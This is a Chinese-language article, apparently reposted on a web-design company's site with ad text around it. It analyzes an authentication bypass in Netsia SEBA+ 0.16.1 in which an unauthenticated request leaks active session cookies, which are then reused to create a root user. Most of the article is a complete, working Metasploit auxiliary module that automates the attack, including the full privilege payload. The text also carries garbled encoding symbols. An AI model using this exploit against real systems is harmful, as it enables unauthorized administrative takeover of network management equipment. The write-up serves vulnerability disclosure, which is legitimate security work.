小編給大家分享一下Netsia-SEBA認(rèn)證繞過(guò)漏洞的示例分析,相信大部分人都還不怎么了解�,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲�,下面讓我們一起去了解一下吧!
在成都做網(wǎng)站����、成都網(wǎng)站設(shè)計(jì)中從網(wǎng)站色彩、結(jié)構(gòu)布局��、欄目設(shè)置���、關(guān)鍵詞群組等細(xì)微處著手�,突出企業(yè)的產(chǎn)品/服務(wù)/品牌�,幫助企業(yè)鎖定精準(zhǔn)用戶(hù),提高在線(xiàn)咨詢(xún)和轉(zhuǎn)化�,使成都網(wǎng)站營(yíng)銷(xiāo)成為有效果、有回報(bào)的無(wú)錫營(yíng)銷(xiāo)推廣�����。創(chuàng)新互聯(lián)專(zhuān)業(yè)成都網(wǎng)站建設(shè)十多年了�����,客戶(hù)滿(mǎn)意度97.8%,歡迎成都創(chuàng)新互聯(lián)客戶(hù)聯(lián)系���。
漏洞分析
不幸的是��,由于我無(wú)法訪(fǎng)問(wèn)到產(chǎn)品的源代碼����,因此我無(wú)法跟大家詳細(xì)描述該漏洞的原始成因�����。
在應(yīng)用程序中���,對(duì)““Active Sessions”部分HTTP請(qǐng)求可以由root/admin用戶(hù)訪(fǎng)問(wèn),而不需要任何會(huì)話(huà)(cookie)信息�����。因此����,我們就可以從響應(yīng)中讀取應(yīng)用程序中活動(dòng)用戶(hù)的會(huì)話(huà)cookie信息內(nèi)容。
需要注意的是���,我們無(wú)法在應(yīng)用程序的其他地方發(fā)送類(lèi)似的請(qǐng)求�。換句話(huà)說(shuō),我們只能在“Active Sessions”這里才能夠在沒(méi)有會(huì)話(huà)信息的情況下發(fā)送這種請(qǐng)求����。
通過(guò)執(zhí)行“GET /session/list/allActiveSession”請(qǐng)求,我們可以通過(guò)獲取響應(yīng)返回的會(huì)話(huà)信息來(lái)獲取授權(quán)用戶(hù)的cookie值�。
此時(shí),我們手上是有一個(gè)cookie值的�,但會(huì)話(huà)很可能馬上就結(jié)束了。所以最好的攻擊向量就是創(chuàng)建一個(gè)新用戶(hù)��。
因此���,我們可以在“POST /authentication server/user/add”字段中附帶請(qǐng)求所必須的數(shù)據(jù)來(lái)向應(yīng)用程序添加一個(gè)新的root用戶(hù)���。
在上圖所執(zhí)行的攻擊中,在獲得登錄用戶(hù)的cookie值后�,未經(jīng)授權(quán)的攻擊者可以通過(guò)將此cookie值放置在用戶(hù)添加請(qǐng)求中來(lái)創(chuàng)建具有完整權(quán)限的新用戶(hù),具體如下圖所示:
如上圖所示�����,HTTP響應(yīng)表明請(qǐng)求的用戶(hù)已成功添加�。稍后���,攻擊者可以輕松地使用這個(gè)具有完整權(quán)限的用戶(hù)登錄到應(yīng)用程序并執(zhí)行所有其他操作。
漏洞利用高級(jí)開(kāi)發(fā)(MSF:Auxiliary)
關(guān)于Auxiliary模塊
Metasploit框架包括數(shù)百個(gè)執(zhí)行掃描�,模糊(漏洞檢查),嗅探等輔助模塊����。 雖然這些模塊不會(huì)給你一個(gè)外殼,但它們?cè)谶M(jìn)行滲透測(cè)試時(shí)非常有價(jià)值�����?!皊how auxiliary”可以顯示所有的輔助模塊:
漏洞利用模塊通常是為在系統(tǒng)上執(zhí)行命令而編寫(xiě)的,而MSF的Auxiliary適用于各種常見(jiàn)類(lèi)型的漏洞�����,比如說(shuō)從目標(biāo)主機(jī)獲取信息��,或利用目標(biāo)主機(jī)中的現(xiàn)有漏洞來(lái)創(chuàng)建新的攻擊向量�����。
因此�,我們可以利用MSF的Auxiliary模塊來(lái)對(duì)這個(gè)漏洞進(jìn)行利用設(shè)計(jì)。
class MetasploitModule < Msf::Auxiliary
此時(shí)不會(huì)生成Payload�����,因?yàn)槲覀儧](méi)有選擇Msf::Exploit::Remote��。
接下來(lái)��,我們將分配用戶(hù)名和密碼作為注冊(cè)選項(xiàng)�。這里使用的是Rex::Text.rand_text_alphanumeric()函數(shù)來(lái)生成密碼隨機(jī)值,該功能可以為漏洞利用提供便利�。
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'The username for your new account']),
OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)])
])接下來(lái),請(qǐng)求“/session/list/allActiveSession”��,并根據(jù)響應(yīng)進(jìn)行檢查�。如果響應(yīng)中包含“sessionId”,則表示存在活動(dòng)會(huì)話(huà)����。如果沒(méi)有“sessionId”且包含“SUCCESS”,則表示應(yīng)用程序易受攻擊�,但沒(méi)有活動(dòng)會(huì)話(huà)。
def check
begin
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
)
rescue
return Exploit::CheckCode::Unknown
end
if res.code == 200 and res.body.include? 'sessionId'
return Exploit::CheckCode::Vulnerable
else
if res.code == 200 and res.body.include? 'SUCCESS'
print_status("Target is vulnerable! But active admin session was not found. Try again later.")
return Exploit::CheckCode::Appears
end
end
return Exploit::CheckCode::Safe
End如上所述的檢查模塊就足以完成該過(guò)程����,我們不需要讓Auxiliary去運(yùn)行不必要的檢測(cè)�,因?yàn)槿绻繕?biāo)不存在漏洞����,則執(zhí)行其他操作毫無(wú)意義。
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
End
接下來(lái)�����,我們就可以開(kāi)始編寫(xiě)漏洞利用代碼了����。
首先,我們需要了解Netsia SEBA+應(yīng)用程序中有多少活動(dòng)會(huì)話(huà)�����。因?yàn)榭梢杂卸鄠€(gè)用戶(hù)處于活動(dòng)狀態(tài)����,其中一些可能不是授權(quán)用戶(hù),而我們需要使用權(quán)限最高的活躍用戶(hù)來(lái)進(jìn)行攻擊���。因此,我決定創(chuàng)建一個(gè)單獨(dú)的計(jì)數(shù)方法��。
def count_user(data, find_string)
data.scan(/(?=#{find_string})/).count
End我們將把HTTP響應(yīng)指定為數(shù)據(jù),并且查找字符串“sessionId”����。這樣一來(lái),返回的響應(yīng)中“sessionId”的數(shù)量就意味著有同樣多的用戶(hù)處于活動(dòng)狀態(tài)���,稍后我們還需要提取這些sessionId值�。
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
)
sescount = count_user(res.body,'"name"')
print_good("Currently #{sescount} active sessions have been detected.")以上部分完成了第一步操作���,接下來(lái)需要提取sessionId值���。
“sessionId”:“和”“action”之間的部分是sessionId在響應(yīng)中的值,我們可以使用scan ()函數(shù)來(lái)搜索正則表達(dá)式([\S\s]*?)來(lái)實(shí)現(xiàn)我們的目標(biāo)��。
cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/)
在上述過(guò)程中����,cookies[0]將是第一個(gè)用戶(hù)的sessionId值,而cookies[1]則是第二個(gè)用戶(hù)的sessionId值�,此時(shí)計(jì)數(shù)+1。
現(xiàn)在�,我們將應(yīng)用一個(gè)非常簡(jiǎn)單的向量來(lái)進(jìn)行開(kāi)發(fā)。
我們將發(fā)送一個(gè)包含所有活動(dòng)cookie值的用戶(hù)創(chuàng)建請(qǐng)求,無(wú)論這些cookie中的哪一個(gè)被授權(quán)��,它都將在我們想要的用戶(hù)數(shù)據(jù)庫(kù)中創(chuàng)建新用戶(hù)�����。
在這里我選擇使用while循環(huán)�。例如,有7個(gè)活動(dòng)用戶(hù)���,而這個(gè)循環(huán)將為cookies[int]變量中的值加上+1�,并發(fā)出各種可能的請(qǐng)求�����。
while $i <= sescount do
sessloop = cookies[$i]
sessid = "SESSION=" + sessloop.to_s
cookie = sessid.split('"]').join('').split('["').join('')
$i +=1
json_data=[........]
res = send_request_raw({
'method' => 'POST',
'ctype' => 'application/json',
'uri' => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'),
'cookie' => cookie,
'data' => json_data
})
End像上面這樣的循環(huán)對(duì)于這個(gè)向量就足夠了�。最后,我們需要檢查請(qǐng)求是否成功�。
如果創(chuàng)建了所需的用戶(hù),它將提供信息并返回新創(chuàng)建的用戶(hù)信息����。
if res.code == 200 and res.body.include? '"SUCCESS"'
print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.")
print_good("Username : #{datastore["USERNAME"]}")
print_good("Password : #{datastore["PASSWORD"]}")
break
End漏洞利用實(shí)踐
Auxiliary模塊現(xiàn)在已完成,接下來(lái)我們將所有內(nèi)容整合在一起:
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Netsia SEBA+ <= 0.16.1 Authentication Bypass and Add Root User' ,
'Description' => %q{
This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user.
HTTP requests made to the "Active Sessions" section which can be accessed by root/admin user,
can be performed without the need for any session(cookie) information.
Therefore, the session cookie informations of the active users in the application can be read from the response content.
A new authorized user can be created with the obtained cookie.
},
'References' =>
[
[ 'CVE', '' ],
[ 'URL', 'https://www.pentest.com.tr/exploits/Netsia-SEBA-0-16-1-Authentication-Bypass-Add-Root-User-Metasploit.html' ],
[ 'URL', 'https://www.netsia.com' ]
],
'Author' =>
[
'?zkan Mustafa AKKU? ' # Discovery & PoC & MSF Module @ehakkus
],
'License' => MSF_LICENSE,
'DisclosureDate' => "2021-01-06",
'DefaultOptions' => { 'SSL' => true }
))
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'The username for your new account']),
OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)])
])
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def check
begin
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
)
rescue
return Exploit::CheckCode::Unknown
end
if res.code == 200 and res.body.include? 'sessionId'
return Exploit::CheckCode::Vulnerable
else
if res.code == 200 and res.body.include? 'SUCCESS'
print_status("Target is vulnerable! But active admin session was not found. Try again later.")
return Exploit::CheckCode::Appears
end
end
return Exploit::CheckCode::Safe
end
def count_user(data, find_string)
data.scan(/(?=#{find_string})/).count
end
def run
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"),
)
sescount = count_user(res.body,'"name"')
print_good("Currently #{sescount} active sessions have been detected.")
cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/)
puts cookies
$i = 0
while $i <= sescount do
sessloop = cookies[$i]
sessid = "SESSION=" + sessloop.to_s
cookie = sessid.split('"]').join('').split('["').join('')
$i +=1
json_data='{"data": {"password": "' + datastore["PASSWORD"] + '", "roles": [{"locations": [], "name": "admin", "permList": [{"data": ["/alarm-manager/alarm/definition/list", "/alarm-manager/alarm/active/list", "/alarm-manager/alarm/active/get", "/alarm-manager/alarm/log/list", "/alarm-manager/alarm/log/search"], "perm_key": "alarm:view"}, {"data": ["/sepon-core/profile/get/service", "/sepon-core/profile/list/service"], "perm_key": "services:view"}, {"data": ["/sepon-core/node/list/edge-ext"], "perm_key": "edge-ext:view"}, {"data": ["/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "uiconfig:view"}, {"data": ["/pal/switchinfo/list"], "perm_key": "switch:view"}, {"data": ["/asup/bbsl"], "perm_key": "asup:bbsl"}, {"data": ["/sepon-core/node/list", "/sepon-core/node/get"], "perm_key": "location:view"}, {"data": ["/pal/olt/get", "/pal/olt/nniport", "/pal/olt/ponport", "/pal/inventory/olt-list", "/sepon-core/node/list/olt", "/pal/laginfo/get"], "perm_key": "olt:view"}, {"data": ["/bbsl*/olt/reboot"], "perm_key": "olt:reboot"}, {"data": ["/sepon-core/node/delete"], "perm_key": "edge:delete"}, {"data": ["/user/add"], "perm_key": "default"}, {"data": ["/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/provision", "/bbsl*/subscriber/preprovision", "/bbsl*/subscriber/provision-subscriber", "/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/continue-provision-with-service-definition", "/bbsl*/subscriber/delete-service", "/bbsl*/subscriber/delete-services", "/bbsl*/subscriber/provision-service", "/bbsl*/subscriber/update-service-subscription"], "perm_key": "subscriptions:edit"}, {"data": ["/authentication-server/user/add", "/authentication-server/user/update"], "perm_key": "user:edit"}, {"data": ["/home/dashboard", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:edit"}, {"data": ["/sepon-core/node/delete/force"], "perm_key": "edge:forcedelete"}, {"data": ["/sepon-core/profile/delete/service"], "perm_key": "services:delete"}, {"data": ["/bbsl*/onu/provision-onu", "/bbsl*/onu/undo-provision", "/sepon-core/node/update", "/bbsl*/onu/delete-onu", "/bbsl*/onu/provision-onu", "/bbsl*/onu/update-serial", "/bbsl*/onu/onu-power"], "perm_key": "onu:edit"}, {"data": ["/alarm-manager/response-code"], "perm_key": "alarm:response-code"}, {"data": ["/authentication-server/request/list", "/authentication-server/request/search", "/authentication-server/request/count"], "perm_key": "request_history:view"}, {"data": ["/sepon-core/profile/add/service"], "perm_key": "services:edit"}, {"data": ["/authentication-server/user/delete"], "perm_key": "user:delete"}, {"data": ["/pal/speedprofile/delete", "/sepon-core/profile/delete/speed"], "perm_key": "speed_profiles:delete"}, {"data": ["/sepon-core/profile/sync/security", "/sepon-core/profile/add/sync/security", "/sepon-core/profile/delete/sync/security", "/sepon-core/profile/get/sync/security", "/sepon-core/profile/list/sync/security", "/sepon-core/profile/list/sync/security/by-profile-id", "/sepon-core/profile/list/sync/security/by-edge-id"], "perm_key": "security_profiles:sync"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:perf-query"}, {"data": ["/authentication-server/user/list", "/authentication-server/user/get"], "perm_key": "user:view"}, {"data": ["/bbsl*/onu/reboot"], "perm_key": "onu:reboot"}, {"data": ["/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/service-subscription", "/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-onu-serial-uni-no-service-name", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/uni-subscription-info-location"], "perm_key": "subscriptions:view"}, {"data": ["/pal/technologyprofile/get", "/pal/technologyprofile/list", "/sepon-core/profile/get/tech", "/sepon-core/profile/list/tech"], "perm_key": "tech_profiles:view"}, {"data": ["/authentication-server/response-code"], "perm_key": "auth:response-code"}, {"data": ["/sepon-core/node/move"], "perm_key": "location:move"}, {"data": ["/pal/olt-location/add"], "perm_key": "oltlocation:edit"}, {"data": ["/sepon-core/node/delete"], "perm_key": "location:delete"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "dashboard:view"}, {"data": ["/authentication-server/role/list", "/authentication-server/role/get"], "perm_key": "role:view"}, {"data": ["/sepon-core/profile/sync/service", "/sepon-core/profile/add/sync/service", "/sepon-core/profile/delete/sync/service", "/sepon-core/profile/get/sync/service", "/sepon-core/profile/list/sync/service", "/sepon-core/profile/list/sync/service/by-profile-id", "/sepon-core/profile/list/sync/service/by-edge-id"], "perm_key": "services:sync"}, {"data": ["/sepon-core/node/get/root", "/pal/inventory/all", "/pal/inventory/pon-port-list", "/pal/inventory/uni-list", "/pal/inventory/onu-list", "/pal/inventory/olt-list", "/pal/switchinfo/list", "/pal/inventory/olt", "/pal/inventory/olt-list", "/pal/inventory/olt-location-list", "/pal/inventory/onu", "/pal/inventory/onu-list", "/pal/inventory/onu-with-serial-number", "/pal/inventory/pon-port", "/pal/inventory/pon-port-list", "/pal/inventory/uni", "/pal/inventory/uni-list", "/pal/inventory/uni"], "perm_key": "topology:view"}, {"data": ["/bbsl*/subscriber/update-service-subscription-status"], "perm_key": "services:statuschange"}, {"data": ["/sepon-core/profile/sync/speed", "/sepon-core/profile/add/sync/speed", "/sepon-core/profile/delete/sync/speed", "/sepon-core/profile/get/sync/speed", "/sepon-core/profile/list/sync/speed", "/sepon-core/profile/list/sync/speed/by-profile-id", "/sepon-core/profile/list/sync/speed/by-edge-id"], "perm_key": "speed_profiles:sync"}, {"data": ["/bbsl*/property/add", "/bbsl*/property/update", "/bbsl*/property/delete"], "perm_key": "property:edit"}, {"data": ["/sepon-core/node/add/edge", "/sepon-core/node/refresh/edge", "/sepon-core/node/get/edge", "/sepon-core/node/update"], "perm_key": "edge:edit"}, {"data": ["/sepon-core/profile/sync/tech", "/sepon-core/profile/add/sync/tech", "/sepon-core/profile/delete/sync/tech", "/sepon-core/profile/get/sync/tech", "/sepon-core/profile/list/sync/tech", "/sepon-core/profile/list/sync/tech/by-profile-id", "/sepon-core/profile/list/sync/tech/by-edge-id"], "perm_key": "tech_profiles:sync"}, {"data": ["/bbsl*/olt/delete"], "perm_key": "olt:delete"}, {"data": ["/sepon-core/node/list/edge", "/sepon-core/node/get/edge"], "perm_key": "edge:view"}, {"data": ["/sepon-core/node/add/location", "/sepon-core/node/update"], "perm_key": "location:edit"}, {"data": ["/alarm-manager/alarm/resolve"], "perm_key": "alarm:edit"}, {"data": ["/discovery/list"], "perm_key": "discovery:view"}, {"data": ["/pal/property/get"], "perm_key": "property:view"}, {"data": ["/sepon-core/node/move"], "perm_key": "edge:move"}, {"data": ["/asup/pal"], "perm_key": "asup:pal"}, {"data": ["/authentication-server/role/delete"], "perm_key": "role:delete"}, {"data": ["/pal/switchinfo/update"], "perm_key": "topology:edit"}, {"data": ["/pal/olt-location/delete"], "perm_key": "oltlocation:delete"}, {"data": ["/bbsl*/onu/disable", "/bbsl*/onu/enable"], "perm_key": "onu:statuschange"}, {"data": ["/alarm-manager/event/definition/list", "/alarm-manager/event/log/list", "/alarm-manager/event/log/search"], "perm_key": "event:view"}, {"data": ["/pal/technologyprofile/delete", "/sepon-core/profile/delete/tech"], "perm_key": "tech_profiles:delete"}, {"data": ["/pal/speedprofile/add", "/pal/speedprofile/create", "/sepon-core/profile/add/speed"], "perm_key": "speed_profiles:edit"}, {"data": ["/authentication-server/role/add", "/authentication-server/role/update"], "perm_key": "role:edit"}, {"data": ["/edge-*"], "perm_key": "gateway-test:view"}, {"data": ["/bbsl*/olt/add", "/sepon-core/node/update"], "perm_key": "olt:edit"}, {"data": ["/service-admin"], "perm_key": "service-admin:view"}, {"data": ["/asup/seba-central"], "perm_key": "asup:core"}, {"data": ["/alarm-manager/mailNotification/add", "/alarm-manager/mailNotification/update", "/alarm-manager/mailNotification/delete"], "perm_key": "alarm-mail:edit"}, {"data": ["/pal/securityprofile/get", "/pal/securityprofile/list", "/sepon-core/profile/get/security", "/sepon-core/profile/list/security"], "perm_key": "security_profiles:view"}, {"data": ["/alarm-manager/mailNotification/list", "/alarm-manager/mailNotification/active/list", "/alarm-manager/mailNotification/get"], "perm_key": "alarm-mail:view"}, {"data": ["/bbsl*/subscriber/delete", "/bbsl*/subscriber/delete-all-subscriber", "/bbsl*/subscriber/delete-list-of-service"], "perm_key": "subscriptions:delete"}, {"data": ["/bbsl*/olt/disable", "/bbsl*/olt/enable"], "perm_key": "olt:statuschange"}, {"data": ["/authentication-server/permission/list", "/authentication-server/permission/getByUser"], "perm_key": "permission:view"}, {"data": ["/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "uiconfig:edit"}, {"data": ["/response-code"], "perm_key": "gateway:response-code"}, {"data": ["/pal/speedprofile/all", "/pal/speedprofile/get", "/pal/speedprofile/list", "/sepon-core/profile/get/speed", "/sepon-core/profile/list/speed"], "perm_key": "speed_profiles:view"}, {"data": ["/pal/ont/device", "/pal/ont/uniport", "/pal/ont/whitelist", "/pal/inventory/onu-list", "/pal/ont/stats-by-olt-number", "/pal/ont/stats-by-pon-port-number", "/pal/ont/search"], "perm_key": "onu:view"}, {"data": ["/pal/securityprofile/delete", "/sepon-core/profile/delete/security"], "perm_key": "security_profiles:delete"}, {"data": ["/pal/securityprofile/add", "/pal/securityprofile/create", "/sepon-core/profile/add/security"], "perm_key": "security_profiles:edit"}, {"data": ["/temip_integration/get_alarm_list"], "perm_key": "temip:view"}, {"data": ["/authentication-server/session/list"], "perm_key": "session:view"}, {"data": ["/stats-manager/response-code"], "perm_key": "stat:response-code"}, {"data": ["/bbsl*/onu/delete-onu"], "perm_key": "onu:delete"}, {"data": ["/pal/olt-location/get", "/pal/inventory/olt-location-list", "/sepon-core/node/list/oltLocation"], "perm_key": "oltlocation:view"}, {"data": ["/pal/technologyprofile/add", "/sepon-core/profile/add/tech"], "perm_key": "tech_profiles:edit"}]}, {"locations": [], "name": "default", "permList": [{"data": ["/user/add"], "perm_key": "default"}]}, {"locations": [{"id": 1, "name": "root"}], "name": "root", "permList": []}], "status": "ACTIVE", "username": "' + datastore["USERNAME"] + '"}}'
res = send_request_raw({
'method' => 'POST',
'ctype' => 'application/json',
'uri' => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'),
'cookie' => cookie,
'data' => json_data
})
if res.code == 200 and res.body.include? '"SUCCESS"'
print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.")
print_good("Username : #{datastore["USERNAME"]}")
print_good("Password : #{datastore["PASSWORD"]}")
break
end
end
end
end接下來(lái)���,我們就可以使用Auxiliary模塊來(lái)進(jìn)行漏洞利用了:
漏洞修復(fù)
Netsia現(xiàn)已修復(fù)了這個(gè)漏洞�����,如果沒(méi)有授權(quán)的cookie�,則無(wú)法再發(fā)送此請(qǐng)求����。即使您是授權(quán)的管理員用戶(hù),也會(huì)看到會(huì)話(huà)cookies被過(guò)濾掉�。
以上是“Netsia-SEBA認(rèn)證繞過(guò)漏洞的示例分析”這篇文章的所有內(nèi)容,感謝各位的閱讀��!相信大家都有了一定的了解�,希望分享的內(nèi)容對(duì)大家有所幫助,如果還想學(xué)習(xí)更多知識(shí)�,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道!
標(biāo)題名稱(chēng):Netsia-SEBA認(rèn)證繞過(guò)漏洞的示例分析
本文鏈接:
http://weahome.cn/article/gdesse.html
重慶分公司
重慶分公司
